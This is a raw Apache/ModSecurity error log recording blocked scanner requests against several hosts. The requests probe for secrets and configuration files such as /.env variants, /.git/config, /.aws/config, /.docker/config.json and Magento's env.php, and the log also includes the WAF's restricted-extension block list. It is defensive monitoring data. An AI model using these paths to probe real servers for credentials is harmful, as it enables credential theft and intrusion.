[Wed Jan 14 17:36:00.322694 2026] [:error] [pid 1413483] [client 34.220.197.24:55210] [client 34.220.197.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_error.log"] [unique_id "aWfF8EEv6TAVy2O49w-G5QAAAAU"]
[Wed Jan 14 17:36:00.323031 2026] [:error] [pid 1413483] [client 34.220.197.24:55210] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_error.log"] [unique_id "aWfF8EEv6TAVy2O49w-G5QAAAAU"]
[Wed Jan 14 17:36:00.323204 2026] [:error] [pid 1413483] [client 34.220.197.24:55210] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_error.log"] [unique_id "aWfF8EEv6TAVy2O49w-G5QAAAAU"]
[Wed Jan 14 17:36:04.689865 2026] [authz_core:error] [pid 1413456] [client 34.220.197.24:56188] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/log/nginx
[Wed Jan 14 17:36:05.408067 2026] [authz_core:error] [pid 1413485] [client 34.220.197.24:56346] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/log/apache2
[Wed Jan 14 17:36:06.128369 2026] [authz_core:error] [pid 1413483] [client 34.220.197.24:56488] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php
[Wed Jan 14 17:36:06.848464 2026] [:error] [pid 1413484] [client 34.220.197.24:56646] [client 34.220.197.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/application.log"] [unique_id "aWfF9vcsqy-MSlD5wL45IQAAAAY"]
[Wed Jan 14 17:36:06.849544 2026] [:error] [pid 1413484] [client 34.220.197.24:56646] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/application.log"] [unique_id "aWfF9vcsqy-MSlD5wL45IQAAAAY"]
[Wed Jan 14 17:36:06.849735 2026] [:error] [pid 1413484] [client 34.220.197.24:56646] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/application.log"] [unique_id "aWfF9vcsqy-MSlD5wL45IQAAAAY"]
[Wed Jan 14 17:36:07.568197 2026] [authz_core:error] [pid 1413459] [client 34.220.197.24:56806] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/logs
[Wed Jan 14 17:36:08.283650 2026] [authz_core:error] [pid 1413458] [client 34.220.197.24:56968] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/logs
[Wed Jan 14 17:36:14.775031 2026] [:error] [pid 1413460] [client 34.220.197.24:58328] [client 34.220.197.24] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aWfF_gByDtVd7SkMa28kcAAAAAQ"]
[Wed Jan 14 17:36:14.775241 2026] [:error] [pid 1413460] [client 34.220.197.24:58328] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aWfF_gByDtVd7SkMa28kcAAAAAQ"]
[Wed Jan 14 17:36:14.775402 2026] [:error] [pid 1413460] [client 34.220.197.24:58328] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aWfF_gByDtVd7SkMa28kcAAAAAQ"]
[Wed Jan 14 17:36:18.399095 2026] [:error] [pid 1413484] [client 34.220.197.24:59044] [client 34.220.197.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/errors.log"] [unique_id "aWfGAvcsqy-MSlD5wL45IwAAAAY"]
[Wed Jan 14 17:36:18.399412 2026] [:error] [pid 1413484] [client 34.220.197.24:59044] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/errors.log"] [unique_id "aWfGAvcsqy-MSlD5wL45IwAAAAY"]
[Wed Jan 14 17:36:18.399579 2026] [:error] [pid 1413484] [client 34.220.197.24:59044] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/errors.log"] [unique_id "aWfGAvcsqy-MSlD5wL45IwAAAAY"]
[Wed Jan 14 17:36:19.116377 2026] [:error] [pid 1413459] [client 34.220.197.24:59214] [client 34.220.197.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "aWfGA0mBk0CuCHAyPqetLAAAAAM"]
[Wed Jan 14 17:36:19.116683 2026] [:error] [pid 1413459] [client 34.220.197.24:59214] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "aWfGA0mBk0CuCHAyPqetLAAAAAM"]
[Wed Jan 14 17:36:19.116843 2026] [:error] [pid 1413459] [client 34.220.197.24:59214] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "aWfGA0mBk0CuCHAyPqetLAAAAAM"]
[Wed Jan 14 17:36:22.703310 2026] [:error] [pid 1413485] [client 34.220.197.24:59982] [client 34.220.197.24] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWfGBrz8c3lrfqFQknOrfQAAAAc"]
[Wed Jan 14 17:36:22.703532 2026] [:error] [pid 1413485] [client 34.220.197.24:59982] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWfGBrz8c3lrfqFQknOrfQAAAAc"]
[Wed Jan 14 17:36:22.703723 2026] [:error] [pid 1413485] [client 34.220.197.24:59982] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWfGBrz8c3lrfqFQknOrfQAAAAc"]
[Wed Jan 14 17:36:30.652220 2026] [:error] [pid 1413459] [client 34.220.197.24:33650] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "aWfGDkmBk0CuCHAyPqetLgAAAAM"]
[Wed Jan 14 17:36:30.652430 2026] [:error] [pid 1413459] [client 34.220.197.24:33650] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "aWfGDkmBk0CuCHAyPqetLgAAAAM"]
[Wed Jan 14 17:36:30.652599 2026] [:error] [pid 1413459] [client 34.220.197.24:33650] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "aWfGDkmBk0CuCHAyPqetLgAAAAM"]
[Wed Jan 14 23:16:06.317224 2026] [:error] [pid 1413483] [client 142.93.102.171:52138] [client 142.93.102.171] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWgVpkEv6TAVy2O49w-HBQAAAAU"]
[Wed Jan 14 23:16:06.317526 2026] [:error] [pid 1413483] [client 142.93.102.171:52138] [client 142.93.102.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWgVpkEv6TAVy2O49w-HBQAAAAU"]
[Wed Jan 14 23:16:06.317700 2026] [:error] [pid 1413483] [client 142.93.102.171:52138] [client 142.93.102.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWgVpkEv6TAVy2O49w-HBQAAAAU"]
[Thu Jan 15 02:46:57.107387 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWhHEfr_2TO49pGIjpB53AAAAAM"]
[Thu Jan 15 02:46:57.107616 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWhHEfr_2TO49pGIjpB53AAAAAM"]
[Thu Jan 15 02:46:57.107762 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWhHEfr_2TO49pGIjpB53AAAAAM"]
[Thu Jan 15 02:46:57.131588 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWhHEfr_2TO49pGIjpB53QAAAAM"]
[Thu Jan 15 02:46:57.131798 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWhHEfr_2TO49pGIjpB53QAAAAM"]
[Thu Jan 15 02:46:57.131953 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWhHEfr_2TO49pGIjpB53QAAAAM"]
[Thu Jan 15 02:46:57.153182 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aWhHEfr_2TO49pGIjpB53gAAAAM"]
[Thu Jan 15 02:46:57.153305 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aWhHEfr_2TO49pGIjpB53gAAAAM"]
[Thu Jan 15 02:46:57.153493 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aWhHEfr_2TO49pGIjpB53gAAAAM"]
[Thu Jan 15 02:46:57.153653 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aWhHEfr_2TO49pGIjpB53gAAAAM"]
[Thu Jan 15 02:46:57.178916 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aWhHEfr_2TO49pGIjpB53wAAAAM"]
